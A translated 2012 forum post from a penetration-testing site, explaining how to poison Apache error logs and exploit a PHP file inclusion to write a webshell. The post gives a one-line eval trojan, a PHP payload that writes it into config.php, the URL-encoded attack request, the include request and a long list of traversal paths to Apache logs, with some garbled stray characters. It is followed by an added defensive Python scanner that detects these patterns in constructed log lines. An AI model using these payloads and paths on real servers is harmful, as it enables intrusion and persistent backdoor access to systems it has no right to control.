中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: PHP include of the Apache log to write a webshell

Author: admin    Time: 2012-9-15 14:27
Title: PHP include of the Apache log to write a webshell
Because the method above is not very practical (in my testing I found the log is often tens of megabytes, so playing with it that way is no fun), the idea below goes a step further: we write a real, usable webshell, which is far better than that painfully slow method above.

For example, take the same one-line trojan again:
<?eval($_POST[cmd]);?>

By now you have probably thought of it: this is a pretty good approach. Read on. How to write the file becomes the question. Use this statement: fopen opens the file /home/virtual/www.xxx.com/forum/config.php, then writes the one-line trojan server-side statement <?eval($_POST[cmd]);?> into it. Put together as a PHP statement, that is:

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?>   // write the one-line trojan statement into config.php

We submit this statement, let Apache record it in the error log, then include the log and the shell is written successfully. Remember that it must be converted to URL-encoded form or it will not work.
Converted, it becomes:
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
We submit:
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
( [/ d; H  i! F  ]8 m6 ^. `; `
Now the error log has recorded this line of webshell-writing code.
Next we include the log, submitting:
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
. o, \6 \* F( ]8 `% ^$ h: ~% I
With that the webshell is written successfully: config.php now contains the one-line trojan statement.
OK.
http://www.xxx.com/forum/config.php has become our webshell.
Connect to it with lanker's client and the host is yours.
: w) [9 q7 W" S$ X
PS: The prerequisite for everything above is that the directory permissions must be writable; it has to be -rwxrwxrwx (777) to proceed, which you can check directly against the directories listed above. Everything above is exploitation in the case where the log path is already known.

For other log paths, you can guess, or refer to the following list.
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/error_log
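As an added defender-side example (this is not code from the original post or from the forum), the Python scanner below flags the two artefacts the post relies on when they show up in Apache logs: PHP code landing in a request record or in an error-log "File does not exist" entry (the poisoning step), and include parameters that traverse to one of the log locations in the list above. The log lines are constructed samples, and the parsing assumes the standard combined access-log format and the Apache 2.2-style error-log line; both are assumptions of this example.

```python
"""Detect Apache log poisoning and log-file inclusion attempts in web server logs.

Added example; all sample log lines below are constructed for illustration.
"""
import re
from urllib.parse import unquote

# Combined access-log layout: ip ident user [time] "request" status size "referer" "agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) \S+'
)
# Apache writes the already-decoded filesystem path into this error-log message,
# which is why percent-encoded PHP in a URL ends up as plain PHP in the error log.
ERROR_RE = re.compile(r'File does not exist: (?P<path>.+)$')

# PHP open tags (including the short tag) and functions typical of a dropped one-liner.
PHP_CODE_RE = re.compile(
    r'<\?(php|=)?|eval\s*\(|fopen\s*\(|fputs\s*\(|system\s*\(|passthru\s*\(', re.I
)
# Directory traversal, raw or percent-encoded.
TRAVERSAL_RE = re.compile(r'(\.\./|\.\.\\|%2e%2e%2f|%2e%2e/|\.\.%2f)', re.I)
# A reference to an Apache access/error log under a logs, httpd or apache directory.
LOG_TARGET_RE = re.compile(r'/(logs?|httpd|apache2?)/[^/\s]*(access|error)[^/\s]*', re.I)


def fully_decode(s, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads (%253C ...) are caught too."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def analyze_access_line(line):
    """Return a dict with the client, decoded request target and a list of findings,
    or None if the line is not in combined format."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    parts = m.group('request').split(' ')
    target = parts[1] if len(parts) >= 2 else m.group('request')
    decoded_target = fully_decode(target)
    findings = []
    # Check the whole decoded record, so PHP smuggled in any logged field is seen.
    if PHP_CODE_RE.search(fully_decode(line)):
        findings.append('php-code-in-request')
    if TRAVERSAL_RE.search(target) or TRAVERSAL_RE.search(decoded_target):
        findings.append('path-traversal')
    if LOG_TARGET_RE.search(decoded_target):
        findings.append('log-file-target')
    return {'ip': m.group('ip'), 'target': decoded_target, 'findings': findings}


def analyze_error_line(line):
    """Flag error-log entries whose requested path already contains PHP code."""
    m = ERROR_RE.search(line)
    if not m:
        return None
    path = m.group('path')
    findings = ['php-code-in-error-log'] if PHP_CODE_RE.search(path) else []
    return {'path': path, 'findings': findings}


def scan(access_lines, error_lines):
    """Return only the records that produced at least one finding."""
    alerts = []
    for line in access_lines:
        rec = analyze_access_line(line)
        if rec and rec['findings']:
            alerts.append(rec)
    for line in error_lines:
        rec = analyze_error_line(line)
        if rec and rec['findings']:
            alerts.append(rec)
    return alerts


# Constructed sample records (not real traffic).
ACCESS = [
    '203.0.113.5 - - [15/Sep/2012:14:27:01 +0800] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [15/Sep/2012:14:27:05 +0800] "GET /%3C%3Fphp%20echo%201%3B%20%3F%3E HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [15/Sep/2012:14:27:09 +0800] "GET /z.php?zizzy=../../../../../../var/log/httpd/error_log HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
]
ERROR = [
    '[Sat Sep 15 14:27:05 2012] [error] [client 203.0.113.5] File does not exist: /var/www/html/<?php echo 1; ?>',
    '[Sat Sep 15 14:27:02 2012] [error] [client 203.0.113.5] File does not exist: /var/www/html/favicon.ico',
]

if __name__ == '__main__':
    for alert in scan(ACCESS, ERROR):
        print(alert)
```

Run it against real access and error logs by feeding the file lines to `scan`; a hit on `php-code-in-error-log` shortly followed by a `log-file-target` request from the same client is the sequence the post describes, and the include parameter in that second request names the script whose include path needs an allow-list.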

Welcome to 中国网络渗透测试联盟 (China Network Penetration Testing Alliance) (https://cobjon.com/) Powered by Discuz! X3.2